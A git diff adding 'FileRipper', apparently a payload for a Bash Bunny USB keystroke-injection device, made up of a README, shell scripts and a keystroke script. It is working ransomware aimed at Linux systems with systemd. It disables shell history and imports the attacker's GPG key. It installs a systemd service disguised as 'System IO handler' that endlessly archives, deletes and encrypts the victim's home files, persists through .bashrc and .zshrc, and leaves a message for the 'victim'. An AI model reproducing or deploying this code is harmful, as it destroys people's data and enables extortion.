diff --git a/payloads/library/execution/FileRipper/README.md b/payloads/library/execution/FileRipper/README.md new file mode 100644 index 00000000..3d609fec --- /dev/null +++ b/payloads/library/execution/FileRipper/README.md @@ -0,0 +1,51 @@ +## About: +* Title: FileRipper +* Description: FileRipper is a payload which encrypts users data. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## FileRipper: FileRipper is a payload which encrypts users data using asymmetric cipher. + +### Features: +* Encrypts personal files and directories in home directory. +* Decryptable using private key. +* Persistent. +* Autostart payload on boot. + +### Workflow: +1. Stop storing history, this helps to keep tracks clear from begining. +2. Importing Public GPG key. +3. Creating non-root systemd service. +4. Deploying fileRipper. +5. Autostarting service on opening terminal with shell (bash and zsh). +6. Entering Message. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| fileRipper | /tools/ | +| public.pub | /tools/ | + +### Changes to be made: +* Replace key name "alice" with your key name in payload.sh on line no ```50```. +* Replace key name "alice" with your key name in fileRipper on line no ```6```. + +### Usage: +* #### Create new key pair: + ```gpg --full-gen-key --expert``` +* #### Dump public key of freshly created gpg key: + ```gpg --armor --export > public.pub``` + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +#### Support me if you like my work: +* https://twitter.com/drapl0n + diff --git a/payloads/library/execution/FileRipper/fileRipper b/payloads/library/execution/FileRipper/fileRipper new file mode 100644 index 00000000..df475a3c --- /dev/null +++ b/payloads/library/execution/FileRipper/fileRipper @@ -0,0 +1,11 @@ +#!/bin/sh +cd ~/ +encrypt(){ + dirFile=$(ls | head -n 1) + tar cf ~/.crypttt/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.crypttt' --remove-files $dirFile + gpg -e -r alice -o ~/.crypttt/$dirFile.tar.gpg ~/.crypttt/$dirFile.tar.gz && rm -rf ~/.crypttt/$dirFile.tar.gz +} +for (( ; ; )) +do + encrypt +done diff --git a/payloads/library/execution/FileRipper/payload.sh b/payloads/library/execution/FileRipper/payload.sh new file mode 100644 index 00000000..8eace516 --- /dev/null +++ b/payloads/library/execution/FileRipper/payload.sh @@ -0,0 +1,15 @@ +#!/bin/bash +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/tools/public.pub /tmp +gpg --import /tmp/public.pub +rm /tmp/public.pub +mkdir ~/.crypttt +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysCall -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service +mkdir /var/tmp/.system +cp -r $mntt/tools/fileRipper /var/tmp/.system/sysCall +chmod +x /var/tmp/.system/sysCall +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp diff --git a/payloads/library/execution/FileRipper/payload.txt b/payloads/library/execution/FileRipper/payload.txt new file mode 100644 index 00000000..c2ca2299 --- /dev/null +++ b/payloads/library/execution/FileRipper/payload.txt @@ -0,0 +1,99 @@ +# Title: FileRipper +# Description: FileRipper is a payload which encrypts users data. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [executing payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 2000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 +# REM replace 'alice' with name of your key +Q STRING gpg --edit-key alice +Q ENTER +Q DELAY 300 +Q STRING trust +Q ENTER +Q DELAY 200 +Q STRING 5 +Q ENTER +Q DELAY 190 +Q STRING y +Q ENTER +Q CTRL c +Q DELAY 200 +Q STRING gpg --check-trustdb +Q ENTER +Q STRING gpg --update-trustdb +Q ENTER +Q DELAY 300 +Q STRING systemctl --user enable --now libSystemIO.service +Q ENTER +Q DELAY 300 +Q STRING systemctl --user start libSystemIO.service +Q ENTER +Q DELAY 100 +Q DELAY 200 + +# REM [autostart on opening terminal] +Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc +Q ENTER +Q DELAY 200 +Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc +Q ENTER + +# REM [Message] +# REM Remove this block if you dont want to prompt message to victim. +# REM Change your message. +Q ENTER +Q DELAY 100 +Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc +Q ENETR +Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc +Q ENTER + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +# Q STRING exit +Q ENTER +LED FINISH